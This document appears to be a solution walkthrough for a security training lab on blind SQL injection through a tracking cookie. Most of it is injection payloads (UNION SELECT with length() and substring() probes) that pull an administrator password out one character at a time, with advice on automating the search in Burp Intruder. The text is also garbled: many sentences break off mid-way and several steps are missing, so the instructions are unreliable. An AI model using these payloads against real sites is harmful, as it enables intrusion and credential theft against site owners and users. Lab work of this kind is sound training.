This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called
users, with columns called
password. You need to exploit the blind SQL injection vulnerability to find out the password of the
To solve the lab, log in as the
TrackingIdcookie, changing it to:
TrackingId=x'+OR+1=1--. Verify that the "Welcome back" message appears in the response.
TrackingId=x'+OR+1=2--. Verify that the "Welcome back" message does not appear in the response. This demonstrates how you can test a single boolean condition and infer the result.
x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'--. Verify that the condition is true, confirming that there is a user called
administratoruser. To do this, change the value to:
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>1--. This condition should be true, confirming that the password is greater than 1 character in length.
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>2--. Then send:
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>3--. And so on. You can do this manually using Burp Repeater, since the length is likely to be short. When the condition stops being true (i.e. when the "Welcome back" message disappears), you have determined the length of the password, which is in fact 20 characters long.
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,1,1)='a'--. This uses the
substring()function to extract a single character from the password, and test it against a specific value. Our attack will cycle through each position and possible value, testing each one in turn.
acharacter in the cookie value. To do this, select just the
a, and click the "Add §" button. You should then see the following as the cookie value (note the payload position markers):
For more advanced users, the solution described here could be made more elegant in various ways. For example, instead of iterating over every character, you could perform a binary search of the character space. Or you could create a single Intruder attack with two payload positions and the "Cluster bomb" attack type, and work through all permutations of offsets and character values.